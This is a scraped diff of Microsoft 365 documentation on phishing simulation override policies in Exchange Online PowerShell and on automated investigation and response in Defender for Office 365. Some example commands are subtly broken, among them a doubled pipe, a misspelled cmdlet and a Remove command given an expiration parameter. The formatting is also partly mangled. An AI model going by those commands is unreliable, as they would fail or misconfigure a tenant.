-3. Optionally, identity the phishing simulation URLs in **non-email** phishing simulations (links in Teams messages or in Office documents) that shouldn't be treated as real threats at time of click.
-
-#### Step 1: Use PowerShell to create the phishing simulation override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example creates the phishing simulation override policy.
-
-```powershell
-New-PhishSimOverridePolicy -Name PhishSimOverridePolicy
-```
-
-Regardless of the Name value you specify, the policy name is _PhishSimOverridePolicy_, so you might as well use that value.
-
-For detailed syntax and parameter information, see [New-PhishSimOverridePolicy](/powershell/module/exchange/new-phishsimoverridepolicy).
-
-#### Step 2: Use PowerShell to create the phishing simulation override rule
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-ExoPhishSimOverrideRule -Name <ArbitraryTextValue> -Policy PhishSimOverridePolicy -Domains <Domain1>,<Domain2>,...<Domain10> -SenderIpRanges <IPAddressEntry1>,<IPAddressEntry2>,...<IPAddressEntry10>
-```
-
-Regardless of the Name value you specify, the rule name will be `_Exe:PhishSimOverr:<GUID\>` \[sic\] where \<GUID\> is a unique GUID value (for example, 6fed4b63-3563-495d-a481-b24a311f8329).
-
-A valid IP address entry is one of the following values:
--- Single IP: For example, 192.168.1.1.-- IP range: For example, 192.168.0.1-192.168.0.254.-- CIDR IP: For example, 192.168.0.1/25.-
-This example creates the phishing simulation override rule with the specified settings.
-
-```powershell
-New-ExoPhishSimOverrideRule -Policy PhishSimOverridePolicy -Domains fabrikam.com,wingtiptoys.com -SenderIpRanges 192.168.1.55
-```
-
-For detailed syntax and parameter information, see [New-ExoPhishSimOverrideRule](/powershell/module/exchange/new-exophishsimoverriderule).
-
-#### Step 3: (Optional) Use PowerShell to identify the phishing simulation URLs to allow
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-New-TenantAllowBlockListItems -Allow -ListType Url -ListSubType AdvancedDelivery -Entries "<URL1>","<URL2>",..."<URL10>" <[-NoExpiration] | [-ExpirationDate <DateTime>]>
-```
-
-For details about the URL syntax, see [URL syntax for the Tenant Allow/Block List](tenant-allow-block-list-urls-configure.md#url-syntax-for-the-tenant-allowblock-list)
-
-This example adds a URL allow entry for the specified third-party phishing simulation URL with no expiration.
-
-```powershell
-New-TenantAllowBlockListItems -Allow -ListType Url -ListSubType AdvancedDelivery -Entries *.fabrikam.com -NoExpiration
-```
-
-For detailed syntax and parameter information, see [New-TenantAllowBlockListItems](/powershell/module/exchange/new-tenantallowblocklistitems).
-
-### Use PowerShell to view the phishing simulation override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example returns detailed information about the one and only phishing simulation override policy.
-
-```powershell
-Get-PhishSimOverridePolicy
-```
-
-For detailed syntax and parameter information, see [Get-PhishSimOverridePolicy](/powershell/module/exchange/get-phishsimoverridepolicy).
-
-### Use PowerShell to view phishing simulation override rules
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell)), this example returns detailed information about phishing simulation override rules.
-
-```powershell
-Get-ExoPhishSimOverrideRule
-```
-
-Although the previous command should return only one rule, any rules that are pending deletion might also be included in the results.
-
-This example identifies the valid rule (one) and any invalid rules.
-
-```powershell
-Get-ExoPhishSimOverrideRule | Format-Table Name,Mode
-```
-
-After you identify the invalid rules, you can remove them by using the **Remove-ExoPhishSimOverrideRule** cmdlet as described [later in this article](#use-powershell-to-remove-phishing-simulation-override-rules).
-
-For detailed syntax and parameter information, see [Get-ExoPhishSimOverrideRule](/powershell/module/exchange/get-exophishsimoverriderule).
-
-### Use PowerShell to view the allowed phishing simulation URL entries
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), run the following command:
-
-```powershell
-Get-TenantAllowBlockListItems -ListType Url -ListSubType AdvancedDelivery
-```
-
-For detailed syntax and parameter information, see [Get-TenantAllowBlockListItems](/powershell/module/exchange/get-tenantallowblocklistitems).
-
-### Use PowerShell to modify the phishing simulation override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Set-PhishSimOverridePolicy -Identity PhishSimOverridePolicy [-Comment "<DescriptiveText>"] [-Enabled <$true | $false>]
-```
-
-This example disables the phishing simulation override policy.
-
-```powershell
-Set-PhishSimOverridePolicy -Identity PhishSimOverridePolicy -Enabled $false
-```
-
-For detailed syntax and parameter information, see [Set-PhishSimOverridePolicy](/powershell/module/exchange/set-phishsimoverridepolicy).
-
-### Use PowerShell to modify phishing simulation override rules
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Get-ExoPhishSimOverrideRule| Set-ExoPhishSimOverrideRule [-Comment "<DescriptiveText>"] [-AddSenderDomainIs <DomainEntry1>,<DomainEntry2>,...<DomainEntryN>] [-RemoveSenderDomainIs <DomainEntry1>,<DomainEntry2>,...<DomainEntryN>] [-AddSenderIpRanges <IPAddressEntry1>,<IPAddressEntry2>,...<IPAddressEntryN>] [-RemoveSenderIpRanges <IPAddressEntry1>,<IPAddressEntry2>,...<IPAddressEntryN>]
-```
-
-or
-
-```powershell
-Set-ExoPhishSimOverrideRule -Identity <PhishSimOverrideRuleIdentity> [-Comment "<DescriptiveText>"] [-AddSenderDomainIs <DomainEntry1>,<DomainEntry2>,...<DomainEntryN>] [-RemoveSenderDomainIs <DomainEntry1>,<DomainEntry2>,...<DomainEntryN>] [-AddSenderIpRanges <IPAddressEntry1>,<IPAddressEntry2>,...<IPAddressEntryN>] [-RemoveSenderIpRanges <IPAddressEntry1>,<IPAddressEntry2>,...<IPAddressEntryN>]
-```
-
-Use the **Get-ExoPhishSimOverrideRule** cmdlet to find the \<PhishSimOverrideRuleIdentity\> values. The name of the rule uses the following syntax: `_Exe:PhishSimOverr:<GUID\>` \[sic\] where \<GUID\> is a unique GUID value (for example, 6fed4b63-3563-495d-a481-b24a311f8329).
-
-This example modifies the (presumably only) phishing simulation override rule with the following settings:
--- Add the domain entry blueyonderairlines.com.-- Remove the IP address entry 192.168.1.55.-
-These changes don't affect existing entries in the rule.
-
-```powershell
-Get-ExoPhishSimOverrideRule| Set-ExoPhishSimOverrideRule| Set-ExoPhishSimOverrideRule -AddSenderDomainIs blueyonderairlines.com -RemoveSenderIpRanges 192.168.1.55
-```
-
-For detailed syntax and parameter information, see [Set-ExoPhishSimOverrideRule](/powershell/module/exchange/set-exophishsimoverriderule).
-
-### Use PowerShell to modify the allowed phishing simulation URL entries
-
-You can't modify the URL values directly. You can [remove existing URL entries](#use-powershell-to-remove-the-allowed-phishing-simulation-url-entries) and [add new URL entries](#step-3-optional-use-powershell-to-identify-the-phishing-simulation-urls-to-allow) as described in this article.
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), to modify other properties of an allowed phishing simulation URL entry (for example, the expiration date or comments), use the following syntax:
-
-```powershell
-Set-TenantAllowBlockListItems <-Entries "<URL1>","<URL2>",..."<URLN>" | -Ids <Identity> -ListType URL -ListSubType AdvancedDelivery <[-NoExpiration] | [-ExpirationDate <DateTime>]> [-Notes <String>]
-```
-
-You identify the entry to modify by its URL values (the _Entries_ parameter) or the Identity value from the output of the **Get-TenantAllowBlockListItems** cmdlet (the _Ids_ parameter).
-
-This example modified the expiration date of the specified entry.
-
-```powershell
-Set-TenantAllowBlockListItems -ListType Url -ListSubType AdvancedDelivery -Entries "*.fabrikam.com" -ExpirationDate 9/11/2021
-```
-
-For detailed syntax and parameter information, see [Set-TenantAllowBlockListItems](/powershell/module/exchange/set-tenantallowblocklistitems).
-
-### Use PowerShell to remove a phishing simulation override policy
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), this example removes the phishing simulation override policy and the corresponding rule.
-
-```powershell
-Remove-PhishSimOverridePolicy -Identity PhishSimOverridePolicy
-```
-
-For detailed syntax and parameter information, see [Remove-PhishSimOverridePolicy](/powershell/module/exchange/remove-phishsimoverridepolicy).
-
-### Use PowerShell to remove phishing simulation override rules
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following commands:
--- Remove any phishing simulation override rules:-
- ```powershell
- Get-ExoPhishSimOverrideRule | Remove-ExoPhishSimOverrideRule
- ```
--- Remove the specified phishing simulation override rule:-
- ```powershell
- Remove-ExoSPhishSimOverrideRule -Identity "_Exe:PhishSimOverr:6fed4b63-3563-495d-a481-b24a311f8329"
- ```
-
-For detailed syntax and parameter information, see [Remove-ExoPhishSimOverrideRule](/powershell/module/exchange/remove-exophishsimoverriderule).
-
-### Use PowerShell to remove the allowed phishing simulation URL entries
-
-In [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell), use the following syntax:
-
-```powershell
-Remove-TenantAllowBlockListItems <-Entries "<URL1>","<URL2>",..."<URLN>" | -Ids <Identity> -ListType URL -ListSubType AdvancedDelivery
-```
-
-You identify the entry to modify by its URL values (the _Entries_ parameter) or the Identity value from the output of the **Get-TenantAllowBlockListItems** cmdlet (the _Ids_ parameter).
-
-This example modified the expiration date of the specified entry.
-
-```powershell
-Remove-TenantAllowBlockListItems -ListType Url -ListSubType AdvancedDelivery -Entries "*.fabrikam.com" -ExpirationDate 9/11/2021
-```
-
-For detailed syntax and parameter information, see [Remove-TenantAllowBlockListItems](/powershell/module/exchange/remove-tenantallowblocklistitems).
security Air About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-about.md
- Title: Automated investigation and response in Microsoft Defender for Office 365-- NOCSH---- Previously updated : 06/09/2023-- MET150-- MOE150--- m365-security-- tier2
-description: Get started using automated investigation and response capabilities in Microsoft Defender for Office 365.
--- air-- seo-marvel-mar2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Automated investigation and response (AIR) in Microsoft Defender for Office 365
--
-[Microsoft Defender for Office 365](mdo-about.md) includes powerful automated investigation and response (AIR) capabilities that can save your security operations team time and effort. As alerts are triggered, it's up to your security operations team to review, prioritize, and respond to those alerts. Keeping up with the volume of incoming alerts can be overwhelming. Automating some of those tasks can help.
-
-AIR enables your security operations team to operate more efficiently and effectively. AIR capabilities include automated investigation processes in response to well-known threats that exist today. Appropriate remediation actions await approval, enabling your security operations team to respond effectively to detected threats. With AIR, your security operations team can focus on higher-priority tasks without losing sight of important alerts that are triggered.
-
-This article describes:
--- The [overall flow of AIR](#the-overall-flow-of-air);-- [How to get AIR](#how-to-get-air); and-- The [required permissions](#required-permissions-to-use-air-capabilities) to configure or use AIR capabilities.-
-This article also includes [next steps](#next-steps), and resources to learn more.
-
-## The overall flow of AIR
-
-An alert is triggered, and a security playbook starts an automated investigation, which results in findings and recommended actions. Here's the overall flow of AIR, step by step:
-
-1. An automated investigation is initiated in one of the following ways:
- - Either [an alert is triggered](#which-alert-policies-trigger-automated-investigations) by something suspicious in email (such as a message, attachment, URL, or compromised user account). An incident is created, and an automated investigation begins; or
- - A security analyst [starts an automated investigation](air-examples.md#example-a-security-administrator-triggers-an-investigation-from-threat-explorer) while using [Explorer](threat-explorer-real-time-detections-about.md).
-
-2. While an automated investigation runs, it gathers data about the email in question and _entities_ related to that email (for example, files, URLs, and recipients). The investigation's scope can increase as new and related alerts are triggered.
-
-3. During and after an automated investigation, [details and results](air-view-investigation-results.md) are available to view. Results might include [recommended actions](air-remediation-actions.md) that can be taken to respond to and remediate any existing threats that were found.
-
-4. Your security operations team reviews the [investigation results and recommendations](air-view-investigation-results.md), and [approves or rejects remediation actions](air-review-approve-pending-completed-actions.md).
-
-5. As pending remediation actions are approved (or rejected), the automated investigation completes.
-
-> [!NOTE]
-> If the investigation does not result in recommended actions the automated investigation will close and the details of what was reviewed as part of the automated investigation will still be available on the investigation page.
-
-In Microsoft Defender for Office 365, no remediation actions are taken automatically. Remediation actions are taken only upon approval by your organization's security team. AIR capabilities save your security operations team time by identifying remediation actions and providing the details needed to make an informed decision.
-
-During and after each automated investigation, your security operations team can:
--- [View details about an alert related to an investigation](air-view-investigation-results.md#view-details-about-an-alert-related-to-an-investigation)-- [View the results details of an investigation](air-view-investigation-results.md#view-details-of-an-investigation)-- [Review and approve actions as a result of an investigation](air-review-approve-pending-completed-actions.md)-
-> [!TIP]
-> For a more detailed overview, see [How AIR works](air-examples.md).
-
-## How to get AIR
-
-AIR capabilities are included in [Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet), as long as [audit logging is turned on](/purview/audit-log-enable-disable) (it's on by default).
-
-In addition, make sure to review your organization's [alert policies](alert-policies-defender-portal.md), especially the [default policies in the Threat management category](/purview/alert-policies#default-alert-policies).
-
-## Which alert policies trigger automated investigations?
-
-Microsoft 365 provides many built-in alert policies that help identify Exchange admin permissions abuse, malware activity, potential external and internal threats, and information governance risks. Several of the [default alert policies](/purview/alert-policies#default-alert-policies) can trigger automated investigations. The following table describes the alerts that trigger automated investigations, their severity in the Microsoft Defender portal, and how they're generated:
-
-|Alert|Severity|How the alert is generated|
-||||
-|A potentially malicious URL click was detected|**High**|This alert is generated when any of the following occurs: <ul><li>A user protected by [Safe Links](safe-links-about.md) in your organization clicks a malicious link</li><li>Verdict changes for URLs are identified by Microsoft Defender for Office 365</li><li>Users override Safe Links warning pages (based on your organization's [Safe Links policy](safe-links-policies-configure.md).</li></ul> <br/> For more information on events that trigger this alert, see [Set up Safe Links policies](safe-links-policies-configure.md).|
-|An email message is reported by a user as malware or phish|**Low**|This alert is generated when users in your organization report messages as phishing email using the [Microsoft Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md).|
-|Email messages containing malicious file removed after delivery|**Informational**|This alert is generated when any messages containing a malicious file are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes using [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md).|
-|Email messages containing malware are removed after delivery|**Informational**|This alert is generated when any email messages containing malware are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes using [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md).|
-|Email messages containing malicious URL removed after delivery|**Informational**|This alert is generated when any messages containing a malicious URL are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes using [zero-hour auto purge (ZAP)](zero-hour-auto-purge.md).|
-|Email messages containing phish URLs are removed after delivery|**Informational**|This alert is generated when any messages containing phish are delivered to mailboxes in your organization. If this event occurs, Microsoft removes the infected messages from Exchange Online mailboxes using [ZAP](zero-hour-auto-purge.md).|
-|Suspicious email sending patterns are detected|**Medium**|This alert is generated when someone in your organization has sent suspicious email and is at risk of being restricted from sending email. The alert is an early warning for behavior that might indicate that the account is compromised, but not severe enough to restrict the user. <p> Although it's rare, an alert generated by this policy may be an anomaly. However, it's a good idea to [check whether the user account is compromised](responding-to-a-compromised-email-account.md).|
-|A user is restricted from sending email|**High**|This alert is generated when someone in your organization is restricted from sending outbound mail. This alert typically results when an [email account is compromised](responding-to-a-compromised-email-account.md). <p> For more information about restricted users, see [Remove blocked users from the Restricted entities page](outbound-spam-restore-restricted-users.md).|
-|Admin triggered manual investigation of email|**Informational**|This alert is generated when an admin triggers the manual investigation of an email from Threat Explorer. This alert notifies your organization that the investigation was started.|
-|Admin triggered user compromise investigation|**Medium**|This alert is generated when an admin triggers the manual user compromise investigation of either an email sender or recipient from Threat Explorer. This alert notifies your organization that the user compromise investigation was started.|
-
-> [!TIP]
-> To learn more about alert policies or edit the default settings, see [Alert policies in the Microsoft Defender portal](alert-policies-defender-portal.md).
-
-## Required permissions to use AIR capabilities
-
-You need to be assigned permissions to use AIR. You have the following options:
--- [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) (Affects the Defender portal only, not PowerShell):
- - _Start an automated investigation_ or _Approve or reject recommended actions_: **Security Operator/Email advanced remediation actions (manage)**.
-- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md):
- - _Set up AIR features_: Membership in the **Organization Management** or **Security Administrator** role groups.
- - _Start an automated investigation_ or _Approve or reject recommended actions_:
- - Membership in the **Organization Management**, **Security Administrator**, **Security Operator**, **Security Reader**, or **Global Reader** role groups.
- and
- - Membership in a role group with the **Search and Purge** role assigned. By default, this role is assigned to the **Data Investigator** and **Organization Management** role groups. Or, you can [create a custom role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) to assign the **Search and Purge** role.
-- [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal):
- - _Set up AIR features_ Membership in the **Global Administrator** or **Security Administrator** roles.
- - _Start an automated investigation_ or _Approve or reject recommended actions_:
- - Membership in the **Global Administrator**, **Security Administrator**, **Security Operator**, **Security Reader**, or **Global Reader** roles.
- and
- - Membership in an Email & collaboration role group with the **Search and Purge** role assigned. By default, this role is assigned to the **Data Investigator** and **Organization Management** role groups. Or, you can [create a custom Email & collaboration role group](mdo-portal-permissions.md#create-email--collaboration-role-groups-in-the-microsoft-defender-portal) to assign the **Search and Purge** role.
-
- Microsoft Entra permissions give users the required permissions _and_ permissions for other features in Microsoft 365.
-
-## Required licenses
-
-[Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) licenses should be assigned to:
--- Security administrators (including global administrators)-- Your organization's security operations team (including security readers and those with the **Search and Purge** role)-- End users-
-## Next steps
--- [Get started using AIR](air-about.md)-- [See details and results of an automated investigation](air-view-investigation-results.md#view-details-of-an-investigation)-- [Review and approve pending actions](air-remediation-actions.md)-- [View pending or completed remediation actions](air-review-approve-pending-completed-actions.md)
security Air Custom Reporting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-custom-reporting.md
- Title: Custom reporting solutions with automated investigation and response-- NOCSH------ MET150-- MOE150--- m365-security-- tier2
-description: Learn how to integrate automated investigation and response with a custom or third-party reporting solution.
Previously updated : 06/09/2023--- air-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Custom or third-party reporting solutions for Microsoft Defender for Office 365
--
-With [Microsoft Defender for Office 365](mdo-about.md), you get [detailed information about automated investigations](air-view-investigation-results.md). However, some organizations also use a custom or third-party reporting solution. If your organization wants to integrate information about [automated investigations](air-about.md) with such a solution, you can use the Office 365 Management Activity API.
-
-With [Microsoft Defender for Office 365](mdo-about.md), you get [detailed information about automated investigations](air-view-investigation-results.md). However, some organizations also use a custom or third-party reporting solution. If your organization wants to integrate information about automated investigations with such a solution, you can use the Office 365 Management Activity API.
-
-|Resource|Description|
-|:|:|
-|[Office 365 Management APIs overview](/office/office-365-management-api/office-365-management-apis-overview)|The Office 365 Management Activity API provides information about various user, admin, system, and policy actions and events from Microsoft 365 and Microsoft Entra activity logs.|
-|[Get started with Office 365 Management APIs](/office/office-365-management-api/get-started-with-office-365-management-apis)|The Office 365 Management API uses Microsoft Entra ID to provide authentication services for your application to access Microsoft 365 data. Follow the steps in this article to set this up.|
-|[Office 365 Management Activity API reference](/office/office-365-management-api/office-365-management-activity-api-reference)|You can use the Office 365 Management Activity API to retrieve information about user, admin, system, and policy actions and events from Microsoft 365 and Microsoft Entra activity logs. Read this article to learn more about how this works.|
-|[Office 365 Management Activity API schema](/office/office-365-management-api/office-365-management-activity-api-schema)|Get an overview of the [Common schema](/office/office-365-management-api/office-365-management-activity-api-schema#common-schema) and the [Defender for Office 365 and threat investigation and response schema](/office/office-365-management-api/office-365-management-activity-api-schema#office-365-advanced-threat-protection-and-threat-investigation-and-response-schema) to learn about specific kinds of data available through the Office 365 Management Activity API.|
-
-## See also
--- [Microsoft Defender for Office 365](mdo-about.md)-- [Automated investigation and response in Microsoft Defender XDR](/microsoft-365/security/defender/m365d-autoir)
security Air Examples https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-examples.md
- Title: How automated investigation and response works in Microsoft Defender for Office 365-- NOCSH------ MET150-- MOE150--- m365-security-- tier2 Previously updated : 06/09/2023
-description: See how automated investigation and response capabilities work in Microsoft Defender for Office 365
--- air-- seo-marvel-mar2020-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# How automated investigation and response works in Microsoft Defender for Office 365
--
-As security alerts are triggered, it's up to your security operations team to look into those alerts and take steps to protect your organization. Sometimes, security operations teams can feel overwhelmed by the volume of alerts that are triggered. Automated investigation and response (AIR) capabilities in Microsoft Defender for Office 365 can help.
-
-AIR enables your security operations team to operate more efficiently and effectively. AIR capabilities include automated investigation processes in response to well-known threats that exist today. Appropriate remediation actions await approval, enabling your security operations team to respond to detected threats.
-
-This article describes how AIR works through several examples. When you're ready to get started using AIR, see [Automatically investigate and respond to threats](air-about.md).
--- [Example 1: A user-reported phish message launches an investigation playbook](#example-a-user-reported-phish-message-launches-an-investigation-playbook)-- [Example 2: A security administrator triggers an investigation from Threat Explorer](#example-a-security-administrator-triggers-an-investigation-from-threat-explorer)-- [Example 3: A security operations team integrates AIR with their SIEM using the Office 365 Management Activity API](#example-a-security-operations-team-integrates-air-with-their-siem-using-the-office-365-management-activity-api)-
-## Example: A user-reported phish message launches an investigation playbook
-
-Suppose that a user in your organization receives an email that they think is a phishing attempt. The user, trained to report such messages, uses the [Microsoft Report Message or Report Phishing add-ins](submissions-users-report-message-add-in-configure.md) to send it to Microsoft for analysis. The submission is also sent to your system and is visible in Explorer in the **Submissions** view (formerly referred to as the **User-reported** view). In addition, the user-reported message now triggers a system-based informational alert, which automatically launches the investigation playbook.
-
-During the root investigation phase, various aspects of the email are assessed. These aspects include:
--- A determination about what type of threat it might be;-- Who sent it;-- Where the email was sent from (sending infrastructure);-- Whether other instances of the email were delivered or blocked;-- An assessment from our analysts;-- Whether the email is associated with any known campaigns;-- and more.-
-After the root investigation is complete, the playbook provides a list of recommended actions to take on the original email and the _entities_ associated with it (for example, files, URLs, and recipients).
-
-Next, several threat investigation and hunting steps are executed:
--- Similar email messages are identified via email cluster searches.-- The signal is shared with other platforms, such as [Microsoft Defender for Endpoint](/windows/security/threat-protection/microsoft-defender-atp/microsoft-defender-advanced-threat-protection).-- A determination is made on whether any users have clicked through any malicious links in suspicious email messages.-- A check is done across [Exchange Online Protection](eop-about.md) (EOP) and [Microsoft Defender for Office 365](mdo-about.md) to see if there are any other similar messages reported by users.-- A check is done to see if a user has been compromised. This check leverages signals across Office 365, [Microsoft Defender for Cloud Apps](/cloud-app-security), and [Microsoft Entra ID](/azure/active-directory), correlating any related user activity anomalies.-
-During the hunting phase, risks and threats are assigned to various hunting steps.
-
-Remediation is the final phase of the playbook. During this phase, remediation steps are taken, based on the investigation and hunting phases.
-
-## Example: A security administrator triggers an investigation from Threat Explorer
-
-In addition to automated investigations that are triggered by an alert, your organization's security operations team can trigger an automated investigation from a view in [Threat Explorer](threat-explorer-real-time-detections-about.md). This investigation also creates an alert, so Microsoft Defender XDR incidents and external SIEM tools can see that this investigation was triggered.
-
-For example, suppose that you are using the **Malware** view in Explorer. Using the tabs below the chart, you select the **Email** tab. If you select one or more items in the list, the **+ Actions** button activates.
--
-Using the **Actions** menu, you can select **Trigger investigation**.
--
-Similar to playbooks triggered by an alert, automatic investigations that are triggered from a view in Explorer include a root investigation, steps to identify and correlate threats, and recommended actions to mitigate those threats.
-
-## Example: A security operations team integrates AIR with their SIEM using the Office 365 Management Activity API
-
-AIR capabilities in Microsoft Defender for Office 365 include [reports & details](air-view-investigation-results.md) that security operations teams can use to monitor and address threats. But you can also integrate AIR capabilities with other solutions. Examples include a security information and event management (SIEM) system, a case management system, or a custom reporting solution. These kinds of integrations can be done by using the [Office 365 Management Activity API](/office/office-365-management-api/office-365-management-activity-api-reference).
-
-For example, recently, an organization set up a way for their security operations team to view user-reported phish alerts that were already processed by AIR. Their solution integrates relevant alerts with the organization's SIEM server and their case-management system. The solution greatly reduces the number of false positives so that their security operations team can focus their time and effort on real threats. To learn more about this custom solution, see [Tech Community blog: Improve the Effectiveness of your SOC with Microsoft Defender for Office 365 and the O365 Management API](https://techcommunity.microsoft.com/t5/microsoft-security-and/improve-the-effectiveness-of-your-soc-with-office-365-atp-and/ba-p/1525185).
-
-## Next steps
--- [Get started using AIR](air-about.md)-- [View pending or completed remediation actions](air-review-approve-pending-completed-actions.md)
security Air Remediation Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-remediation-actions.md
- Title: Remediation actions in Microsoft Defender for Office 365-- NOCSH------ MET150-- MOE150--- m365-security-- tier2
-description: "Learn about remediation actions following automated investigation in Microsoft Defender for Office 365."
Previously updated : 06/09/2023--- air-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Remediation actions in Microsoft Defender for Office 365
--
-## Remediation actions
-
-Threat protection features in [Microsoft Defender for Office 365](mdo-about.md) include certain remediation actions. Such remediation actions can include:
--- Soft delete email messages or clusters-- Block URL (time-of-click)-- Turn off external mail forwarding-- Turn off delegation-
-In Microsoft Defender for Office 365, remediation actions aren't taken automatically. Instead, remediation actions are taken only upon approval by your organization's security operations team.
-
-## Threats and remediation actions
-
-Microsoft Defender for Office 365 includes remediation actions to address various threats. Automated investigations often result in one or more remediation actions to review and approve. In some cases, an automated investigation doesn't result in a specific remediation action. To further investigate and take appropriate actions, use the guidance in the following table.
-
-|Category|Threat/risk|Remediation action(s)|
-|:|:|:|
-|Email|Malware|Soft delete email/cluster <p> If more than a handful of email messages in a cluster contain malware, the cluster is considered to be malicious.|
-|Email|Malicious URL <br> (A malicious URL was detected by [Safe Links](safe-links-about.md).)|Soft delete email/cluster <br> Block URL (time-of-click verification) <p> Email that contains a malicious URL is considered to be malicious.|
-|Email|Phish|Soft delete email/cluster <p> If more than a handful of email messages in a cluster contain phishing attempts, the whole cluster is considered a phishing attempt.|
-|Email|Zapped phish <br> (Email messages were delivered and then [zapped](zero-hour-auto-purge.md).)|Soft delete email/cluster <p> Reports are available to view zapped messages. [See if ZAP moved a message and FAQs](zero-hour-auto-purge.md#how-to-see-if-zap-moved-your-message).|
-|Email|Missed phish email [reported](submissions-users-report-message-add-in-configure.md) by a user|[Automated investigation triggered by the user's report](air-examples.md#example-a-user-reported-phish-message-launches-an-investigation-playbook)|
-|Email|Volume anomaly <br> (Recent email quantities exceed the previous 7-10 days for matching criteria.)|Automated investigation doesn't result in a specific pending action. <p>Volume anomaly isn't a clear threat, but is merely an indication of larger email volumes in recent days compared to the last 7-10 days. <p>Although a high volume of email can indicate potential issues, confirmation is needed in terms of either malicious verdicts or a manual review of email messages/clusters. See [Find suspicious email that was delivered](threat-explorer-investigate-delivered-malicious-email.md#find-suspicious-email-that-was-delivered).|
-|Email|No threats found <br> (The system didn't find any threats based on files, URLs, or analysis of email cluster verdicts.)|Automated investigation doesn't result in a specific pending action. <p>Threats found and [zapped](zero-hour-auto-purge.md) after an investigation is complete aren't reflected in an investigation's numerical findings, but such threats are viewable in [Threat Explorer](threat-explorer-real-time-detections-about.md).|
-|User|A user clicked a malicious URL <br> (A user navigated to a page that was later found to be malicious, or a user bypassed a [Safe Links warning page](safe-links-about.md#warning-pages-from-safe-links) to get to a malicious page.)|Automated investigation doesn't result in a specific pending action. <p> Block URL (time-of-click) <p> Use Threat Explorer to [view data about URLs and click verdicts](threat-explorer-real-time-detections-about.md#click-verdict-pivot-for-the-url-clicks-view-for-the-details-area-of-the-all-email-view-in-threat-explorer). <p> If your organization is using [Microsoft Defender for Endpoint](/windows/security/threat-protection/), consider [investigating the user](/microsoft-365/security/defender-endpoint/investigate-user) to determine if their account is compromised.|
-|User|A user is sending malware/phish|Automated investigation doesn't result in a specific pending action. <p> The user might be reporting malware/phish, or someone could be [spoofing the user](anti-phishing-protection-spoofing-about.md) as part of an attack. Use [Threat Explorer](threat-explorer-real-time-detections-about.md) to view and handle email containing [malware](threat-explorer-real-time-detections-about.md#malware-view-in-threat-explorer-and-real-time-detections) or [phishing](threat-explorer-real-time-detections-about.md#phish-view-in-threat-explorer-and-real-time-detections).|
-|User|Email forwarding <br> (Mailbox forwarding rules are configured, chch could be used for data exfiltration.)|Remove forwarding rule <p> Use the [Autoforwarded messages report](/exchange/monitoring/mail-flow-reports/mfr-auto-forwarded-messages-report) to view specific details about forwarded email.|
-|User|Email delegation rules <br> (A user's account has delegations set up.)|Remove delegation rule <p> If your organization is using [Microsoft Defender for Endpoint](/windows/security/threat-protection/), consider [investigating the user](/microsoft-365/security/defender-endpoint/investigate-user) who's getting the delegation permission.|
